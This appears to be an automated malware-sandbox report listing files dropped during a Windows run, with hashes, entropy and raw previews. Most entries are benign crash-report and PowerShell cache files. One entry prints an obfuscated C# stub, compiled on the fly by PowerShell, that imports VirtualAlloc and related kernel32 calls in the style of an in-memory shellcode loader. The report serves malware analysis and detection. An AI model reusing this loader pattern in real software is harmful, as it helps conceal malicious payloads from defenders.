                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.4.1.2.<./.P.i.d.>.......

                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER92B4.tmp.xml

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):4564
                                  Entropy (8bit):4.4295856797524245
                                  Encrypted:false
                                  SSDEEP:48:cvIwSD8zsRjiJgtWI9sKWgc8sqYjv98fm8M4J2+eFdy+q84tnKcQIcQw05d:uITfR8DrgrsqY+JCyxKkw05d
                                  MD5:16B6D4E0C2DEB8065E7983CD830F569E
                                  SHA1:1A10ECA9E35D27E8C4BCFBC1B9BAE308CFC9DF19
                                  SHA-256:2163D18F061F6F3F668BA5523DA52B8DC369F2280B14D8F40DF62107D771D284
                                  SHA-512:DE9F5506E8F66BD2C88462D2EE8CD17CBB30A49EAE76F11A48C49045948F73C12F870ACDF5A11A83C0A1AB6D4BBD619C471DCA78D270C9A771F5802139B682CD
                                  Malicious:false
                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1530388" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERB4.tmp.WERInternalMetadata.xml

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):8334
                                  Entropy (8bit):3.696770086623689
                                  Encrypted:false
                                  SSDEEP:192:Rrl7r3GLNiea6bfsJF6Y4ESUvygmfdSTuF+prt89bGrsfBim:RrlsNiz6AL6Y7SUvygmfdS2Gwfl
                                  MD5:B4F2249C9E1E95ACD23328456F73501B
                                  SHA1:EDBE451D27E46ABF17BC19DF0C19730C97C3CB3C
                                  SHA-256:055D2B211EB4B6A4BF5FBC6AF6EAEE51954B7DF11DD839490F9E8B8ABA60BF58
                                  SHA-512:BE42FED65F24C0048AED342EF64FDFEEA225FDDA52B0195E0546A09009ADC89A48304CB9131C6E9AE0112EDA97C1758548EC14924100309BF1328B6B50F5EF1E
                                  Malicious:false
                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.4.1.2.<./.P.i.d.>.......

                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERF019.tmp.dmp

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Mini DuMP crash report, 15 streams, Wed May 25 09:17:26 2022, 0x1205a4 type
                                  Category:dropped
                                  Size (bytes):35550
                                  Entropy (8bit):2.0449694115507002
                                  Encrypted:false
                                  SSDEEP:96:548o0Z8NGYN/PstghMlut4oi7naA7gY9Ia8a8gBIto0yuzGOEpGWInWIBcI4ig+U:NoN/kFlutFOnDp8aPIth0diruwcHgMc
                                  MD5:65FDC72CD726599D759E7274DC60A636
                                  SHA1:87C8F17966167B2DB369AD804DD25B812CC37E95
                                  SHA-256:FE3418CBA4A861A752455C666FD015DE45658246AC0E46393CA6D7AA7B2EBD9D
                                  SHA-512:273F1D2370821747AFF41310A0C146BB953EC19F37B6F2C87EF8B6CF3D57CD24B1E53F79DB75C17AC2ACF966A8192E17884C90B21245C9F2F100ECC7CC436B20
                                  Malicious:false
                                  Preview:MDMP....... .......&.b........................L...........$................!..........`.......8...........T...........(....z...........................................................................................U...........B..............GenuineIntelW...........T.......T...".b.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERF337.tmp.WERInternalMetadata.xml

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):8352
                                  Entropy (8bit):3.687428412738391
                                  Encrypted:false
                                  SSDEEP:192:Rrl7r3GLNieZ6bfz7W6Y4/SU/agmfkSTuF+pN189bxD1fLbm:RrlsNig6rW6YQSU/agmfkSIxxf2
                                  MD5:74FD9B92F0E260377AB81BC69FE93DC8
                                  SHA1:4618059F78DB06C897B098699E20FC15CE20A8D5
                                  SHA-256:94D9D3951703CF77FD2FBE3D2BBE5D0D85D80E8681A82F06F792D7D3E8A6C4BF
                                  SHA-512:3B4281E2D7632A7424E9755F6E37E95D6BAAB742A3A95A223BE67737234CFB034F1A3547866CD26DBDDC64B51A0D4FA82486D7BA5016F717CDAB6673094368F0
                                  Malicious:false
                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.4.1.2.<./.P.i.d.>.......

                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERF461.tmp.xml

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):4665
                                  Entropy (8bit):4.416956728965737
                                  Encrypted:false
                                  SSDEEP:48:cvIwSD8zsRjiJgtWI9sKWgc8sqYjS8fm8M4J2+RF9+q8vQ+dKcQIcQw0Id:uITfR8DrgrsqYTJbKBKkw0Id
                                  MD5:4019014DD19B29109C956D908BC3CAEA
                                  SHA1:047E7CC508262D828C3A4BDAC8439C29C137A0BC
                                  SHA-256:89310B171B8E13456D30A99F98D4F70428B84B46C8A1D5B5EC0BF56999A74A38
                                  SHA-512:415BF93CCF4EC5658B3865E438E2DD27D3EEA3E906CAD5D3BFFF8161E9C16C7C1B495CA60F7E1D551AB4BBF13299C34AF553BFF03AADA7EC810204977BF34D7E
                                  Malicious:false
                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1530388" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERFDF4.tmp.dmp

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Mini DuMP crash report, 15 streams, Wed May 25 09:17:29 2022, 0x1205a4 type
                                  Category:dropped
                                  Size (bytes):35350
                                  Entropy (8bit):1.98471013299236
                                  Encrypted:false
                                  SSDEEP:192:mtt/krdbnOnytIth8di+XxMn2c3DQ7KTeS:nxbOnAIz+X6LR
                                  MD5:9DAEE98C2C818C4484FA218950E2FE8D
                                  SHA1:D860AF829B2271F1B20B13AA6C0092CC32875001
                                  SHA-256:7C35E1635A387BE99A9D3831C457A0ED5D840DF38FEAD0257886429CE85C94ED
                                  SHA-512:1BB87A5E1EB992306ACA54F950EDA5C604C42F93A993EC9D0FCE76EE0CE669B46D176EDBBA24798ED0C1DD9B1E2DB7342D6986680F470D7E5B7E1DD3AA13FAAF
                                  Malicious:false
                                  Preview:MDMP....... .......).b........................L...........$................!..........`.......8...........T...........(....y...........................................................................................U...........B..............GenuineIntelW...........T.......T...".b.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):11606
                                  Entropy (8bit):4.8910535897909355
                                  Encrypted:false
                                  SSDEEP:192:P9smn3YrKkkdcU6ChVsm5emlz9smyib4T4YVsm5emdYxoeRKp54ib49VFn3eGOVJ:dMib4T4YLiib49VoGIpN6KQkj2rIkjhQ
                                  MD5:F84F6C99316F038F964F3A6DB900038F
                                  SHA1:C9AA38EC8188B1C2818DBC0D9D0A04085285E4F1
                                  SHA-256:F5C3C45DF33298895A61B83FC6E79E12A767A2AE4E06B43C44C93CE18431793E
                                  SHA-512:E5B80F0D754779E6445A14B8D4BA29DD6D0060CD3DA6AFD00416DDC113223DB48900F970F9998B2ABDADA423FBA4F11E9859ABB4E6DBA7FE9550E7D1D0566F31
                                  Malicious:false
                                  Preview:PSMODULECACHE.....7B\.....C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope................a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Uninstall-Package........Set-PackageSource........Get-PackageSource........Find-Package........Register-PackageSource........Import-PackageProvider.........3......[...C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package...

                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):1192
                                  Entropy (8bit):5.325275554903011
                                  Encrypted:false
                                  SSDEEP:24:3aEPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKJJx5:qEPerB4nqRL/HvFe9t4Cv94ar5
                                  MD5:05CF074042A017A42C1877FC5DB819AB
                                  SHA1:5AF2016605B06ECE0BFB3916A9480D6042355188
                                  SHA-256:971C67A02609B2B561618099F48D245EA4EB689C6E9F85232158E74269CAA650
                                  SHA-512:96C1C1624BB50EC8A7222E4DD21877C3F4A4D03ACF15383E9CE41070C194A171B904E3BF568D8B2B7993EADE0259E65ED2E3C109FD062D94839D48DFF041439A
                                  Malicious:false
                                  Preview:@...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

                                  C:\Users\user\AppData\Local\Temp\RES10A0.tmp

                                  Download File
                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
                                  Category:dropped
                                  Size (bytes):1328
                                  Entropy (8bit):3.9937375893458604
                                  Encrypted:false
                                  SSDEEP:24:Hne9E2+fz4fDfHJhKdNWI+ycuZhNGakSOPNnq9qd:Zz4L3Kd41ulGa3Sq9K
                                  MD5:1CB0708B686A80571C1D6F35AFB4B5EF
                                  SHA1:89B85C23378EC5776703163F5DDE76E0FF0F546A
                                  SHA-256:4BB51F2D6D21CF00382055EE5B08C44141CEF95B3FBEFAFFDA6482AFAEB35EBA
                                  SHA-512:1CDE546BEDBE488883A36428A0F488A1D3B84D0F2F5F46797C9ECA68047B0ED251F2CF5274A45ACBD7FB8B2C2DA0D17512C7FFFC8DE33E72C64A58366D806660
                                  Malicious:false
                                  Preview:L...^.b.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\vebwfha3\CSC57533E6B898B4B7BB8DAE45DDD64B0AA.TMP.................R......L.1.@............4.......C:\Users\user\AppData\Local\Temp\RES10A0.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...v.e.b.w.f.h.a.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                                  C:\Users\user\AppData\Local\Temp\RES20CD.tmp

                                  Download File
                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
                                  Category:dropped
                                  Size (bytes):1328
                                  Entropy (8bit):3.9848344940495912
                                  Encrypted:false
                                  SSDEEP:24:Hre9E2+f5EVDfHeFhKdNWI+ycuZhNRakSvPNnq9qd:t5+SKd41ulRa3tq9K
                                  MD5:1BE7AE55CFD56E91642C7E8AF87D7C49
                                  SHA1:84336142BA5B6836C367B2E4D4601A6DEFD28B1F
                                  SHA-256:2514F3E3AED73A9CF0ACBA0E2E3D8366C8E0B480602AFD96D1013189C110FE10
                                  SHA-512:5C950D3A5672B611C6C02173898C6EB99B377CBA8FA3BEC979B4DDB39DBF8C203E20EAC885BDE131F1AA53FB7F9317198B4B4F549A7F67AB1351BA2DBEF99D4F
                                  Malicious:false
                                  Preview:L...b.b.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\hpvnexdj\CSC5D09D8212D1C47D8BF5AC4D6502884C9.TMP................Z.BmN.GvF[<e."...........4.......C:\Users\user\AppData\Local\Temp\RES20CD.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...h.p.v.n.e.x.d.j...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ltvm2t1.11d.psm1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:very short file (no magic)
                                  Category:dropped
                                  Size (bytes):1
                                  Entropy (8bit):0.0
                                  Encrypted:false
                                  SSDEEP:3:U:U
                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                  Malicious:false
                                  Preview:1

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mv15gf43.tzv.ps1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:very short file (no magic)
                                  Category:dropped
                                  Size (bytes):1
                                  Entropy (8bit):0.0
                                  Encrypted:false
                                  SSDEEP:3:U:U
                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                  Malicious:false
                                  Preview:1

                                  C:\Users\user\AppData\Local\Temp\hpvnexdj\CSC5D09D8212D1C47D8BF5AC4D6502884C9.TMP

                                  Download File
                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                  File Type:MSVC .res
                                  Category:dropped
                                  Size (bytes):652
                                  Entropy (8bit):3.1071600486844355
                                  Encrypted:false
                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryTak7YnqqvPN5Dlq5J:+RI+ycuZhNRakSvPNnqX
                                  MD5:C55A91426D4E9E4776465B3C65B422A9
                                  SHA1:0C66B98DCB5B67DA8AC6169D52D7A6DC62B31A60
                                  SHA-256:00CFA6111123329C9E7723ACB0AA9AB035FA19543A912AEC84001847C14B643C
                                  SHA-512:37FC760C898CC3991D187283F7619556B10C1027437B12EEFCD731E7010CEE5DF205CAA5A14473D3F4D4DD7E67EB9C07DB9B8E65973A3F08DD41193ED4F4AD82
                                  Malicious:false
                                  Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...h.p.v.n.e.x.d.j...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...h.p.v.n.e.x.d.j...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                  C:\Users\user\AppData\Local\Temp\hpvnexdj\hpvnexdj.0.cs

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:UTF-8 Unicode (with BOM) text
                                  Category:dropped
                                  Size (bytes):392
                                  Entropy (8bit):4.988829579018284
                                  Encrypted:false
                                  SSDEEP:6:V/DsYLDS81zuJ6VMRSRa+eNMjSSRr92B7SSRNAtwy:V/DTLDfuk9eg5r9yeqy
                                  MD5:80545CB568082AB66554E902D9291782
                                  SHA1:D013E59DC494D017F0E790D63CEB397583DCB36B
                                  SHA-256:E15CA20CFE5DE71D6F625F76D311E84240665DD77175203A6E2D180B43926E6C
                                  SHA-512:C5713126B0CB060EDF4501FE37A876DAFEDF064D9A9DCCD0BD435143DAB7D209EFBC112444334627FF5706386FB2149055030FCA01BA9785C33AC68E268B918D
                                  Malicious:false
                                  Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class buvbcy. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint jujqjjcr,uint fvu);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr fnpqam,uint ecktq,uint arixnpjcmw,uint mbhifa);.. }..}.

                                  C:\Users\user\AppData\Local\Temp\hpvnexdj\hpvnexdj.cmdline

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                  Category:dropped
                                  Size (bytes):369
                                  Entropy (8bit):5.270459273247466
                                  Encrypted:false
                                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fB0zxs7+AEszIwkn23fb:p37Lvkmb6KRfeWZEifT
                                  MD5:4BA7EB41009075E749F0B76FF8E627C7
                                  SHA1:55D0D959642BA2615C822DF87CE34BED865D0E48
                                  SHA-256:C36F10AB5BB15873A62D1C3CB86E83586AE1AB6B4EF500CE0CD1230FD08469C9
                                  SHA-512:ACF474A20AB6D721CDBA5C2F6946ED844BCB29B0F00FAFB623764A150D3D698BEF999D7722B3CDACCDF769ACFE8E5D743CF55C3007288D4C8942980B1938564C
                                  Malicious:false
                                  Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\hpvnexdj\hpvnexdj.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\hpvnexdj\hpvnexdj.0.cs"

                                  C:\Users\user\AppData\Local\Temp\hpvnexdj\hpvnexdj.dll

                                  Download File
                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Category:dropped
                                  Size (bytes):3584
                                  Entropy (8bit):2.5953713703523387
                                  Encrypted:false
                                  SSDEEP:24:etGSk/u2Bg85z7xlfwZD6TgdWqtkZfhKwWI+ycuZhNRakSvPNnq:6NYb5hFCD6GWdJhKr1ulRa3tq
                                  MD5:4DBC5D2FD85CD8734346AB2635CD4690
                                  SHA1:C59399E402B02C71C8E6A63335C3602A830A34AA
                                  SHA-256:3532D05C2301FDE15F9B397F06B0B7F9EEBB42223AA05118F112D636B7FB01DF
                                  SHA-512:F9E77C80C3CC668C30AFB22187BDE3254D7D84CD6E2D4107B5C6ECCD968AB8B7833A585A5E518896017B16FBA8D818C2F5A55C19C2013CA0D682778626CE3820
                                  Malicious:false
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a.b...........!.................#... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..T.............................................................(....*BSJB............v4.0.30319......l...H...#~......4...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................2.+...................................................... 9............ K............ S.....P ......`.........f.....o.....s.....z...............`. ...`...!.`.%...`.......*.....3.+.....9.......K.......S...........

                                  C:\Users\user\AppData\Local\Temp\hpvnexdj\hpvnexdj.out

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                                  Category:modified
                                  Size (bytes):866
                                  Entropy (8bit):5.334990107523655
                                  Encrypted:false
                                  SSDEEP:24:AId3ka6KRffEifyKaM5DqBVKVrdFAMBJTH:Akka6CfEuyKxDcVKdBJj
